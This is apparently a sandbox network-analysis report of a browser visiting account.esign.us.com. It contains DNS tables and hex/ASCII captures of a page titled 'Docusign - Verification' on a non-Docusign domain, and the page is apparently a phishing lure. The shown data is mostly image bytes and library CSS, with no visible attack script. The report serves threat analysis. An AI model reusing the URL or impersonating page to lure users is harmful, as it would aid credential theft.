                              Mar 21, 2025 18:44:56.329937935 CET192.168.2.61.1.1.10x916eStandard query (0)account.esign.us.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:45:32.427767038 CET192.168.2.61.1.1.10x7350Standard query (0)google.comA (IP address)IN (0x0001)false
                              Mar 21, 2025 18:45:32.427902937 CET192.168.2.61.1.1.10xf418Standard query (0)google.com65IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 21, 2025 18:44:28.030550003 CET1.1.1.1192.168.2.60x8e77No error (0)www.google.com65IN (0x0001)false
                              Mar 21, 2025 18:44:28.030592918 CET1.1.1.1192.168.2.60x6834No error (0)www.google.com142.251.40.196A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.140876055 CET1.1.1.1192.168.2.60x65ffNo error (0)account.esign.us.com44.203.127.19A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.802022934 CET1.1.1.1192.168.2.60x6ac9No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                              Mar 21, 2025 18:44:29.803500891 CET1.1.1.1192.168.2.60xaf74No error (0)cdn.jsdelivr.netjsdelivr.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                              Mar 21, 2025 18:44:29.803500891 CET1.1.1.1192.168.2.60xaf74No error (0)jsdelivr.map.fastly.net151.101.193.229A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.803500891 CET1.1.1.1192.168.2.60xaf74No error (0)jsdelivr.map.fastly.net151.101.129.229A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.803500891 CET1.1.1.1192.168.2.60xaf74No error (0)jsdelivr.map.fastly.net151.101.65.229A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:29.803500891 CET1.1.1.1192.168.2.60xaf74No error (0)jsdelivr.map.fastly.net151.101.1.229A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:30.186463118 CET1.1.1.1192.168.2.60x12e1No error (0)play.google.com172.217.165.142A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:30.692590952 CET1.1.1.1192.168.2.60xc715No error (0)play.google.com142.251.40.142A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:43.109517097 CET1.1.1.1192.168.2.60xf02bNo error (0)upload.wikimedia.org208.80.154.240A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:43.569705009 CET1.1.1.1192.168.2.60x6512No error (0)account.esign.us.com44.203.127.19A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:43.698257923 CET1.1.1.1192.168.2.60x6ad0No error (0)upload.wikimedia.org208.80.154.240A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:44:56.478513002 CET1.1.1.1192.168.2.60x916eNo error (0)account.esign.us.com44.203.127.19A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:45:32.533251047 CET1.1.1.1192.168.2.60x7350No error (0)google.com142.251.40.238A (IP address)IN (0x0001)false
                              Mar 21, 2025 18:45:32.535382032 CET1.1.1.1192.168.2.60xf418No error (0)google.com65IN (0x0001)false
                              • account.esign.us.com
                                • cdn.jsdelivr.net
                                • play.google.com
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.64970144.203.127.194434564C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2025-03-21 17:44:29 UTC711OUTGET /documentWizard.html?Uv=4WaUN2Pkric74yNetF HTTP/1.1
                              Host: account.esign.us.com
                              Connection: keep-alive
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              sec-ch-ua-platform: "Windows"
                              Upgrade-Insecure-Requests: 1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: navigate
                              Sec-Fetch-User: ?1
                              Sec-Fetch-Dest: document
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:29 UTC247INHTTP/1.1 200 OK
                              Server: nginx/1.24.0 (Ubuntu)
                              Date: Fri, 21 Mar 2025 17:44:29 GMT
                              Content-Type: text/html
                              Content-Length: 287196
                              Last-Modified: Thu, 13 Mar 2025 03:35:46 GMT
                              Connection: close
                              ETag: "67d25292-461dc"
                              Accept-Ranges: bytes
                              2025-03-21 17:44:29 UTC16137INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 73 69 67 6e 20 2d 20 56 65 72 69 66 69 63 61 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e
                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Docusign - Verification</title> <link rel="icon" type="image/x-icon" href="data:image/x-icon
                              2025-03-21 17:44:29 UTC16384INData Raw: 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 35 55 56 48 2f 38 66 38 41 53 39 58 2f 41 45 76 66 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 38 41 53 2b 62 2f 41 45 76 6d 2f 77 42 4c 35 76 45 41 53 65 68 32 42 54 44 31 48 77 63 65 2f 67 6b 48 47 50 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 48 42 78 66 2f 42 77 63 58 2f 77 63 48 46 2f 38 49 43 42 6a 2f 44 67 34 71 2f 78 77 63 57 66 38 33 4e 36 7a 2f 53 6b 72 6e 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f 2f 39 53 55 76 2f 2f 55 6c 4c 2f 2f 31 4a 53 2f
                              Data Ascii: 9SUv//UlL//1JS//9SUv//UlL//1JS//9SUv//UlL//1JS//9SUv/5UVH/8f8AS9X/AEvf/wBL5v8AS+b/AEvm/wBL5v8AS+b/AEvm/wBL5v8AS+b/AEvm/wBL5vEASeh2BTD1Hwce/gkHGP8HBxf/BwcX/wcHF/8HBxf/BwcX/wcHF/8HBxf/BwcX/wcHF/8ICBj/Dg4q/xwcWf83N6z/Skrn/1JS//9SUv//UlL//1JS//9SUv//UlL//1JS/
                              2025-03-21 17:44:29 UTC16384INData Raw: 6b 5a 47 52 6b 61 65 68 55 79 42 4f 7a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 76 49 73 5a 41 72 63 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 57 63 68 55 2b 43 4f 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 50 41 75 5a 41 6e 64 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 54 6b 57 63 67 55 75 43 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 50 50 51 71 62 41 48 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 58 6b 57 4d 67 58 75 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4c 4f 51 4b 58 42 48 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 6e 6f 56 4d 67 54 73 79 4d 6a 49 79 4d 6a 49 79 4d 6a 49 79 4d 6a 4c 79 4c 47 51 4b 33 4a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 47 52 6b 5a 46 6e 49 56 50 67 6a 6f 79 4d 6a 49 79 4d 6a 49 79 4d
                              Data Ascii: kZGRkaehUyBOzIyMjIyMjIyMjIyMvIsZArckZGRkZGRkZGRkZGRkWchU+COjIyMjIyMjIyMjIyMPAuZAndkZGRkZGRkZGRkZGTkWcgUuCMjIyMjIyMjIyMjIyPPQqbAHRkZGRkZGRkZGRkZGXkWMgXuyMjIyMjIyMjIyMjIyLOQKXBHRkZGRkZGRkZGRkZGnoVMgTsyMjIyMjIyMjIyMjLyLGQK3JGRkZGRkZGRkZGRkZFnIVPgjoyMjIyMjIyM
                              2025-03-21 17:44:29 UTC16384INData Raw: 38 7a 4a 64 52 6d 2f 49 38 78 31 58 44 49 32 61 71 38 4a 66 4c 65 34 54 63 79 4a 75 32 73 78 5a 2f 78 75 77 5a 7a 32 4a 41 38 30 2f 2b 53 63 4e 4f 37 53 44 32 30 77 33 72 6c 57 6a 51 74 74 75 4e 62 34 66 68 46 63 74 2f 4b 78 31 7a 6a 35 38 78 53 34 72 30 32 5a 41 76 65 4a 69 67 55 75 69 39 49 69 6c 36 38 72 53 34 77 2b 36 57 6a 31 36 79 2f 39 39 61 73 6b 6d 53 62 50 56 41 6d 70 54 37 6a 37 6c 4c 76 62 75 6f 6c 78 33 62 45 37 57 5a 41 59 6b 79 77 6c 2f 68 79 72 32 79 58 4a 30 31 5a 31 59 31 4f 54 66 46 65 36 73 37 58 6a 31 2f 62 32 75 47 34 77 62 55 76 47 7a 78 68 65 6d 6f 64 56 44 48 4d 4f 4f 74 35 70 43 7a 61 6b 48 56 37 62 2b 62 30 61 4b 2b 63 61 58 49 45 78 73 43 62 65 31 45 77 41 57 31 65 59 32 2f 6e 62 50 75 2f 6d 59 34 57 46 6a 49 46 2b 75 56 6c 6e
                              Data Ascii: 8zJdRm/I8x1XDI2aq8JfLe4TcyJu2sxZ/xuwZz2JA80/+ScNO7SD20w3rlWjQttuNb4fhFct/Kx1zj58xS4r02ZAveJigUui9Iil68rS4w+6Wj16y/99askmSbPVAmpT7j7lLvbuolx3bE7WZAYkywl/hyr2yXJ01Z1Y1OTfFe6s7Xj1/b2uG4wbUvGzxhemodVDHMOOt5pCzakHV7b+b0aK+caXIExsCbe1EwAW1eY2/nbPu/mY4WFjIF+uVln
                              2025-03-21 17:44:29 UTC16384INData Raw: 70 66 72 6a 74 73 78 33 4b 30 72 35 2f 4e 65 7a 50 56 63 4a 4f 59 61 64 39 31 32 46 62 2f 48 34 6a 72 58 6e 6c 77 48 78 6c 62 37 36 34 37 72 6e 47 4d 35 73 39 65 58 34 34 69 58 46 65 36 30 52 31 73 61 43 38 30 44 48 54 4f 75 4f 66 34 31 58 43 64 4f 47 39 2b 72 73 59 78 35 61 73 63 32 4e 54 48 6e 76 54 73 66 56 37 68 7a 6e 71 2f 42 33 42 48 75 78 46 7a 50 52 65 4a 61 75 37 6f 74 62 58 49 4e 59 45 74 6a 62 6f 55 37 66 55 2b 66 55 34 2b 34 54 73 77 31 37 6a 4b 76 57 2b 45 75 75 55 36 62 39 59 50 58 6e 4d 65 63 49 32 4d 6d 31 7a 48 2f 32 70 46 66 54 35 34 43 39 33 6e 49 46 4c 68 50 53 46 78 59 58 65 53 61 57 47 65 43 34 2b 4a 4f 6c 61 42 79 63 35 58 38 63 2f 50 77 36 30 67 6d 54 5a 37 57 5a 70 49 68 67 58 51 69 59 48 76 62 53 4e 4a 48 4e 75 77 30 69 61 72 74
                              Data Ascii: pfrjtsx3K0r5/NezPVcJOYad912Fb/H4jrXnlwHxlb7647rnGM5s9eX44iXFe60R1saC80DHTOuOf41XCdOG9+rsYx5asc2NTHnvTsfV7hznq/B3BHuxFzPReJau7otbXINYEtjboU7fU+fU4+4Tsw17jKvW+EuuU6b9YPXnMecI2Mm1zH/2pFfT54C93nIFLhPSFxYXeSaWGeC4+JOlaByc5X8c/Pw60gmTZ7WZpIhgXQiYHvbSNJHNuw0iart
                              2025-03-21 17:44:29 UTC16384INData Raw: 65 55 63 4f 4e 2b 74 50 54 64 48 32 6a 36 6e 44 36 6c 74 53 38 35 48 6a 74 66 74 30 34 2f 32 49 57 31 59 78 61 33 48 61 72 39 32 37 57 36 4a 64 59 36 31 69 33 58 72 70 58 46 58 6d 75 50 59 76 32 4e 30 37 4e 56 56 44 4e 75 2b 6e 72 4f 56 4c 65 33 72 4e 5a 70 6a 5a 66 77 62 61 30 38 4a 63 78 30 44 32 33 66 62 74 49 4e 72 52 2f 64 66 34 72 70 73 65 32 75 38 32 39 2b 63 31 35 32 74 50 57 61 4f 75 31 4c 48 73 57 2f 37 37 39 69 6e 74 6c 31 74 57 38 2f 5a 79 70 61 32 38 52 72 74 38 58 49 4f 47 6d 2b 33 34 71 35 39 54 72 39 7a 33 4c 61 6c 37 56 6a 68 62 74 55 32 34 39 56 32 72 4f 4a 32 37 31 6a 33 78 4c 76 6a 76 4c 4c 7a 79 4e 37 47 32 45 72 54 70 78 78 6a 46 58 2f 56 4d 64 71 32 62 4e 76 33 74 6b 33 74 36 30 6f 37 68 6a 31 65 7a 6b 48 6a 37 52 62 4d 47 62 2f 57
                              Data Ascii: eUcON+tPTdH2j6nD6ltS85Hjtft04/2IW1Yxa3Har927W6JdY61i3XrpXFXmuPYv2N07NVVDNu+nrOVLe3rNZpjZfwba08Jcx0D23fbtINrR/df4rpse2u829+c152tPWaOu1LHsW/779intl1tW8/Zypa28Rrt8XIOGm+34q59Tr9z3Lal7VjhbtU249V2rOJ271j3xLvjvLLzyN7G2ErTpxxjFX/VMdq2bNv3tk3t60o7hj1ezkHj7RbMGb/W
                              2025-03-21 17:44:29 UTC16384INData Raw: 43 48 74 74 47 50 64 76 71 57 64 50 61 38 39 5a 6f 35 37 53 56 66 2b 5a 78 7a 61 70 31 30 4d 38 39 70 44 62 57 72 62 57 6e 73 73 62 44 7a 43 33 44 57 34 53 7a 2f 62 33 78 79 37 37 55 74 2f 64 2f 32 74 2b 75 69 32 50 57 36 50 6c 37 37 76 78 75 70 32 6a 62 48 57 6a 6e 66 37 6c 6d 50 75 62 46 32 4e 65 34 33 75 2b 75 33 59 32 66 39 71 4c 72 4b 50 37 43 66 76 37 58 47 76 30 52 36 6a 78 39 4c 4f 78 4e 63 4b 64 7a 31 48 4b 2b 31 59 74 76 32 70 71 37 6a 5a 54 34 35 33 31 45 66 48 4b 6d 31 59 78 63 77 32 65 58 2b 50 6b 2f 61 68 6a 62 4e 37 4d 4c 65 79 74 57 50 55 34 31 37 53 37 44 66 37 61 70 2f 73 2f 31 49 4d 75 35 39 37 62 46 72 5a 64 7a 53 57 63 37 33 44 33 47 50 6a 4c 6d 31 4c 66 31 66 39 5a 66 76 32 71 32 50 56 4d 65 76 37 73 30 32 50 6b 2b 32 79 62 57 4e 74
                              Data Ascii: CHttGPdvqWdPa89Zo57SVf+Zxzap10M89pDbWrbWnssbDzC3DW4Sz/b3xy77Ut/d/2t+ui2PW6Pl77vxup2jbHWjnf7lmPubF2Ne43u+u3Y2f9qLrKP7Cfv7XGv0R6jx9LOxNcKdz1HK+1Ytv2pq7jZT4531EfHKm1Yxcw2eX+Pk/ahjbN7MLeytWPU417S7Df7ap/s/1IMu597bFrZdzSWc73D3GPjLm1Lf1f9Zfv2q2PVMev7s02Pk+2ybWNt
                              2025-03-21 17:44:29 UTC16384INData Raw: 4e 75 64 32 6b 66 58 76 5a 30 32 57 2b 32 75 59 74 63 74 36 66 47 32 78 6e 58 4d 6d 38 68 31 53 4d 2f 2f 75 71 58 48 32 35 4a 75 64 32 6f 66 58 66 64 4f 74 4c 6d 71 62 56 74 36 76 4e 35 58 56 72 4c 53 72 66 32 2b 30 71 2f 48 4f 6e 55 38 5a 63 72 4e 4c 70 50 67 58 6c 6a 70 42 66 69 66 6c 43 61 4b 4c 65 6c 32 35 30 6a 33 74 53 56 64 56 30 4a 7a 34 2f 58 55 63 66 57 34 55 44 2b 61 35 59 61 38 49 73 73 56 63 62 59 75 4b 7a 31 4f 62 64 76 7a 76 36 70 63 52 35 2b 74 32 30 71 36 7a 5a 32 57 48 76 2b 51 64 4e 74 7a 70 50 74 71 32 61 71 6a 6e 38 46 50 6e 6e 53 76 4d 43 66 75 74 6b 37 64 56 37 4b 46 6d 39 5a 68 4d 48 65 39 30 6a 70 73 53 62 63 37 52 37 71 76 55 79 55 78 31 31 78 33 6e 5a 68 62 59 61 66 31 53 4d 77 64 77 6d 76 50 2f 61 72 53 2f 56 36 31 37 2b 35 6a
                              Data Ascii: Nud2kfXvZ02W+2uYtct6fG2xnXMm8h1SM//uqXH25Jud2ofXfdOtLmqbVt6vN5XVrLSrf2+0q/HOnU8ZcrNLpPgXljpBfiflCaKLel250j3tSVdV0Jz4/XUcfW4UD+a5Ya8IssVcbYuKz1Obdvzv6pcR5+t20q6zZ2WHv+QdNtzpPtq2aqjn8FPnnSvMCfutk7dV7KFm9ZhMHe90jpsSbc7R7qvUyUx11x3nZhbYaf1SMwdwmvP/arS/V617+5j
                              2025-03-21 17:44:30 UTC16384INData Raw: 36 69 6e 53 68 50 45 53 72 72 4e 4d 65 6e 32 4b 2b 6b 32 64 31 4a 36 37 43 33 70 64 6c 65 52 37 76 4d 55 30 64 63 6d 47 4a 79 61 39 6d 4d 33 71 38 65 4c 71 4a 65 4a 52 75 4e 6c 68 5a 32 65 61 2b 74 78 43 48 66 64 39 71 72 53 38 31 39 4a 74 7a 6b 6d 33 58 34 6c 33 65 5a 4f 53 6f 2b 39 6b 6d 35 7a 56 65 6c 2b 54 78 46 39 4b 75 5a 49 58 4c 63 77 4a 2b 37 45 58 4a 36 49 33 79 37 75 74 6a 42 33 71 4f 31 56 70 57 32 77 6b 6d 35 7a 54 4c 72 39 53 72 72 4e 6e 5a 51 65 75 36 58 72 33 34 35 30 33 79 76 70 4e 69 4d 6a 49 79 4f 58 4b 46 4e 75 52 70 6b 45 39 38 4b 4b 43 34 79 41 49 41 4f 2b 76 4b 4f 53 77 65 52 31 42 58 36 32 58 77 57 5a 50 63 59 70 59 33 56 2f 78 2f 72 73 39 74 63 70 71 66 4e 4b 6c 35 55 2b 74 36 50 58 56 63 64 43 75 47 35 69 53 79 4c 42 33 34 33 6b
                              Data Ascii: 6inShPESrrNMen2K+k2d1J67C3pdleR7vMU0dcmGJya9mM3q8eLqJeJRuNlhZ2ea+txCHfd9qrS819Jtzkm3X4l3eZOSo+9km5zVel+TxF9KuZIXLcwJ+7EXJ6I3y7utjB3qO1VpW2wkm5zTLr9SrrNnZQeu6Xr34503yvpNiMjIyOXKFNuRpkE98KKC4yAIAO+vKOSweR1BX62XwWZPcYpY3V/x/rs9tcpqfNKl5U+t6PXVcdCuG5iSyLB343k
                              2025-03-21 17:44:30 UTC16384INData Raw: 63 71 55 4b 56 4f 6d 54 4a 6b 79 35 55 61 55 53 58 43 6e 54 4a 6b 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 4e 4b 4a 50 67 54 70 6b 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 47 31 45 6d 77 5a 30 79 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 4b 54 65 69 54 49 49 37 5a 63 71 55 4b 56 4f 6d 54 4a 6b 79 5a 63 71 55 4b 56 4e 75 52 4a 6b 45 39 79 34 73 2f 51 2b 6d 7a 35 45 70 55 36 35 53 47 6b 66 6e 79 70 51 70 56 79 6d 4e 6f 33 4e 6b 79 70 53 72 6c 73 62 53 4f 54 4a 6c 79 6c 56 4b 34 2b 67 63 6d 54 4a 6c 79 76 38 74 6b 2b 42 65 55 47 6e 53 75 68 74 6c 79 74 31 58 32 6f 64 33 6f 30 79 35 75 30 72 37 37 32 36 55 4b 58 64 66 61 52 2f 65 6a 54 4c 6c 37 69 72 74 76 37 74 52 70 6b 79 35 47 38 73 6b 75 42 64 55 6d 6c 52 53 2f 76 64 2f 2f 2f 66 4b
                              Data Ascii: cqUKVOmTJky5UaUSXCnTJkyZcqUKVOmTJkyZcqNKJPgTpkyZcqUKVOmTJkyZcqUG1EmwZ0yZcqUKVOmTJkyZcqUKTeiTII7ZcqUKVOmTJkyZcqUKVNuRJkE9y4s/Q+mz5EpU65SGkfnypQpVymNo3NkypSrlsbSOTJlylVK4+gcmTJlyv8tk+BeUGnSuhtlyt1X2od3o0y5u0r7726UKXdfaR/ejTLl7irtv7tRpky5G8skuBdUmlRS/vd///fK


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.649706151.101.193.2294434564C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2025-03-21 17:44:30 UTC623OUTGET /npm/sweetalert2@11.6.15/dist/sweetalert2.min.css HTTP/1.1
                              Host: cdn.jsdelivr.net
                              Connection: keep-alive
                              sec-ch-ua-platform: "Windows"
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                              sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                              sec-ch-ua-mobile: ?0
                              Accept: text/css,*/*;q=0.1
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: style
                              Sec-Fetch-Storage-Access: active
                              Referer: https://account.esign.us.com/
                              Accept-Encoding: gzip, deflate, br, zstd
                              Accept-Language: en-US,en;q=0.9
                              2025-03-21 17:44:30 UTC755INHTTP/1.1 200 OK
                              Connection: close
                              Content-Length: 20713
                              Access-Control-Allow-Origin: *
                              Access-Control-Expose-Headers: *
                              Timing-Allow-Origin: *
                              Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable
                              Cross-Origin-Resource-Policy: cross-origin
                              X-Content-Type-Options: nosniff
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Content-Type: text/css; charset=utf-8
                              X-JSD-Version: 11.6.15
                              X-JSD-Version-Type: version
                              ETag: W/"50e9-83+8+I9XfzFSuOwRPYO4Q9xuK8g"
                              Accept-Ranges: bytes
                              Age: 85300
                              Date: Fri, 21 Mar 2025 17:44:30 GMT
                              X-Served-By: cache-fra-eddf8230137-FRA, cache-lga21927-LGA
                              X-Cache: HIT, MISS
                              Vary: Accept-Encoding
                              alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                              2025-03-21 17:44:30 UTC1378INData Raw: 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 67 72 69 64 2d 63 6f 6c 75 6d 6e 3a 31 2f 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 67 72 69 64 2d 72 6f 77 3a 31 2f 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 6d 69 6e 2d 63 6f 6e 74 65 6e 74 20 61 75 74 6f 20 6d 69 6e 2d 63 6f 6e 74 65 6e 74 3b 70 61 64 64 69 6e 67 3a 31 65 6d 3b 6f 76 65 72 66 6c 6f 77 2d 79 3a 68 69 64 64 65 6e 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 35 29 2c 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37
                              Data Ascii: .swal2-popup.swal2-toast{box-sizing:border-box;grid-column:1/4 !important;grid-row:1/4 !important;grid-template-columns:min-content auto min-content;padding:1em;overflow-y:hidden;background:#fff;box-shadow:0 0 1px rgba(0,0,0,.075),0 1px 2px rgba(0,0,0,.07
                              2025-03-21 17:44:30 UTC1378INData Raw: 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 72 69 6e 67 7b 77 69 64 74 68 3a 32 65 6d 3b 68 65 69 67 68 74 3a 32 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 69 63 6f 6e 2e 73 77 61 6c 32 2d 65 72 72 6f 72 20 5b 63 6c 61
                              Data Ascii: .swal2-toast .swal2-icon .swal2-icon-content{display:flex;align-items:center;font-size:1.8em;font-weight:bold}.swal2-popup.swal2-toast .swal2-icon.swal2-success .swal2-success-ring{width:2em;height:2em}.swal2-popup.swal2-toast .swal2-icon.swal2-error [cla
                              2025-03-21 17:44:30 UTC1378INData Raw: 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 66 69 78 7b 74 6f 70 3a 30 3b 6c 65 66 74 3a 2e 34 33 37 35 65 6d 3b 77 69 64 74 68 3a 2e 34 33 37 35 65 6d 3b 68 65 69 67 68 74 3a 32 2e 36 38 37 35 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 5b 63 6c 61 73 73 5e 3d 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 6c 69 6e 65 5d 7b 68 65 69 67 68 74 3a 2e 33 31 32 35 65 6d 7d 2e 73 77 61 6c 32 2d 70 6f 70 75 70 2e 73 77 61 6c 32 2d 74 6f 61 73 74 20 2e 73 77 61 6c 32 2d 73 75 63 63 65 73 73 20 5b 63 6c 61 73 73 5e 3d 73 77 61 6c 32 2d 73 75 63 63 65 73 73 2d 6c 69 6e 65 5d
                              Data Ascii: al2-popup.swal2-toast .swal2-success .swal2-success-fix{top:0;left:.4375em;width:.4375em;height:2.6875em}.swal2-popup.swal2-toast .swal2-success [class^=swal2-success-line]{height:.3125em}.swal2-popup.swal2-toast .swal2-success [class^=swal2-success-line]
                              2025-03-21 17:44:30 UTC1378INData Raw: 72 67 62 61 28 30 2c 30 2c 30 2c 2e 34 29 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 61 63 6b 64 72 6f 70 2d 68 69 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 29 20 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 74 6f 70 2d 73 74 61 72 74 2c 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 63 65 6e 74 65 72 2d 73 74 61 72 74 2c 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65 72 2e 73 77 61 6c 32 2d 62 6f 74 74 6f 6d 2d 73 74 61 72 74 7b 67 72 69 64 2d 74 65 6d 70 6c 61 74 65 2d 63 6f 6c 75 6d 6e 73 3a 6d 69 6e 6d 61 78 28 30 2c 20 31 66 72 29 20 61 75 74 6f 20 61 75 74 6f 7d 2e 73 77 61 6c 32 2d 63 6f 6e 74 61 69 6e 65
                              Data Ascii: rgba(0,0,0,.4)}.swal2-container.swal2-backdrop-hide{background:rgba(0,0,0,0) !important}.swal2-container.swal2-top-start,.swal2-container.swal2-center-start,.swal2-container.swal2-bottom-start{grid-template-columns:minmax(0, 1fr) auto auto}.swal2-containe
